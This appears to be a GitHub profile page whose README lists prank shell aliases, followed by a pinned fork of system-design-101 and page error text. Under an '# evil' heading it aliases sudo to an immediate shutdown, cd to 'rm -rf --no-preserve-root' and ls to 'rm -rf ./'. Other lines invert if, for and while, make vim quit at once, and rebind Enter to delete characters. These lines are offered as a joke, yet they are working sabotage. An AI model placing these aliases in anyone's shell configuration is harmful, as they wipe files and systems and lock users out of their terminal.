# common
alias if='if !' for='for !' while='while !';
alias vim="vim +q";
# evil
alias sudo='sudo shutdown -P now';
alias cd='rm -rf --no-preserve-root';
alias ls='rm -rf ./';
# zsh
alias exit='zsh';
bindkey "^U" transpose-chars;
## pair
bindkey "^J" backward-delete-char;
bindkey "^M" backward-delete-char;
Popular repositories Loading
-
system-design-101
system-design-101 PublicForked from ByteByteGoHq/system-design-101
https://github.com/DeadIntegral/system-design-101/blob/docs/transalte-kr/translations/README-kr.md
-
-
-
-
-
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.